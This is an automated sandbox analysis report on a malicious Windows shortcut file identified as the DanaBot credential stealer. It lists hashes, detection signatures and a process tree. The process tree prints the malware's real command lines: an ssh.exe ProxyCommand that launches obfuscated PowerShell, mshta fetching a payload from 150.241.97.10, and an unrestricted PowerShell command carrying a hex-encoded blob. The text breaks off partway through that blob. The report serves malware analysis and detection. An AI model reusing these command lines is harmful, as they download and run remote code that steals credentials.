Edit tour
Windows
Analysis Report
A4FY1OA97K.lnk
Overview
General Information
Sample name: | A4FY1OA97K.lnkrenamed because original name is a hash value |
Original sample name: | 0306addb386436ae663da152bee03226.lnk |
Analysis ID: | 1581248 |
MD5: | 0306addb386436ae663da152bee03226 |
SHA1: | 0c35bff3dafec0f21436b6db025a24e0102ce7b7 |
SHA256: | 32a98d1b299d1feebb096cdeb38433013b7db6adf5d9923b539390d777bfac3f |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
DanaBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DanaBot stealer dll
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
May use the Tor software to hide its network traffic
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- ssh.exe (PID: 4204 cmdline:
"C:\Window s\System32 \OpenSSH\s sh.exe" -o Pr oxyCommand ="powershe ll powersh ell -Comma nd '|\|AbH 4Q3w|fYZxm shta https ://150.241 .97.10/aaa .mp4|\|AbH 4Q3w|fYZx' .SubString (15, 35)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) - conhost.exe (PID: 6372 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6436 cmdline:
powershell powershel l -Command '|\|AbH4Q 3w|fYZxmsh ta https:/ /150.241.9 7.10/aaa.m p4|\|AbH4Q 3w|fYZx'.S ubString(1 5, 35) MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5408 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta http s://150.24 1.97.10/aa a.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 6404 cmdline:
"C:\Window s\system32 \mshta.exe " https:// 150.241.97 .10/aaa.mp 4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7432 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction KYLf E($jfvKN){ return -sp lit ($jfvK N -replace '..', '0x $& ')};$gg UL = KYLfE ('653ADB09 197706BFF2 48B833EA1F 27F5D58878 713451BA8F 31B442364A D50B177565 132C81A8CE 0C04335FB3 68B1BEC213 9714554807 75829F6BC6 C5534155F9 57E2CFA508 A5FE4C311E 066403190F B60B4C1CBC AA36CDF33D 5F614FD5F6 7A8C2528EB C6C4B5B8A0 BCE76A4304 5B19C3EFD6 F5EF3BA1EC B5686BD73B 304C049107 8B179DA1CA 0AE1F3DA25 490E7B58EE 2FF863E346 260ADACB21 649FF36146 554F42D087 971F82489A B30989E3F0 674F581C0C F80616E540 BCAA41B042 8AFCE3F21F EDF2F8472F 6163E56EE7 F1258524A0 3F60DB1043 BAA3A07588 4983F2CF09 2375522F89 88E476AF72 DC3C2FC7AD C9FE050799 2C92239AEC 2429066EBB D2B17CD0CF 69B5F864C0 12338D6D8D D368382C51 60478C96E0 6E3861DF4B 0A736F2572 D32B9090B6 56B519C9EE 189C51F015 6B1592FEE6 EA26686920 8339B1F4A4 CD0C9D18D6 7D96F8EDEA BC3C915510 C81009138C DC34ED0E78 C7B482DF47 3E7EB8A0B3 B274003F05 7FF8E56D8E E713118A6B 7733A69E09 E35C4F1734 DC2CD1DE6A C8BAF51670 83E43F0749 61524961B7 179D937805 AC28E554A8 5FFB0FCE8F FC6971BD36 500B19554E 2CF2C414FD 3F7D20F637 C3FED2CBE4 F16D815833 AF6587C044 5B171F7277 57FCB88407 DA064E176D 7AC09BE6F8 1860913C20 6895922FA1 0CFC3D057E 32F3236CB8 4F7AE4D8C4 681039F91A D409D0EE7A 284E004847 96BDFD0C57 7C1033FC2B 929938AE4E BE01CA086A 4EF8DF874C DFA55DE619 4B2ADD9FBB DE3B65169B 4CE6FC4C5D 063449D421 C5DF87AEB4 18D87EB94D 8085A780CF F969515BFB EB7CDAA25C 3E5DDF20FB B0A604B6DD AADCF97B95 34A77F8A73 360422DF52 B6736926BF B5D66CED1F 6F797F1B6D 9ADE5E0748 59D887E8C3 BAD2D33A41 2611BA85A6 107B8F004E 605620D5E3 F4FBA15B1F F642AB09A7 0A27BFE4F9 7180E1A548 9A15A3E5F7 DB53356E7F 7869F6731F 3815B6F7E8 52698335FA 8BAB0A12F6 8F66EE399C A6B7D1994F CED4BFB476 066214D61A 279B592BED E9BC417384 0D28016672 E7995C751B 825A18AD09 60AFBBBA90 71CC631FAD 152EBE5D6D A49DB75B7B D20456369C DA6719ECA0 462C83310F 3F5AC28103 792DEEACDF A6A31D1277 26B84A5A8E 39A884DF8F ECDA2CDEC9 DC279C956D 253761973C 9EA36666F0 C5DD4C4F33 06483BF681 1C7ED4F026 5F0E66FF77 7C5BB9A9B4 324C54769C 9B5D706B4E C485997D1A DB50FD7156 4B9401E52E 3A3F5CBBCC B76BED1B5C F3AF43B7E7 C4C42DEA2A 7F2E219929 68FAA86787 095556C265 ABB0DB1B02 F1C5C06E0B 96EB6B38F9 8AA3878E78 E92A9D5FBA 55B149C8DD 782681A530 F1C11D9450 5305C1EE8E F1F2597010 4E28DFF997 76F3628512 C465DC2125 A38927E4CF D827415D33 DC2DE13D55 0C5CD8ABCD 58EFF5EF4B 7CDFE93710 EB277C3304 084BD9201E 5DABDEBE54 FAEF993C8A 690421AB36 6C5CF613F7 CAC0628AAD 89849B65FF F1054CB508 E8D107D332 DE6E06598C 86C6E7B2AA 72A92B5D11 793DA06708 8A83ABF915 B5B690EF77 973FDD0590 2457333BF3 D9982DDC98 2CA6E51DE0 8FAEE2B7B8 7DC3B7D255 6D18306A68 F6827EB9C7 A69CEA5174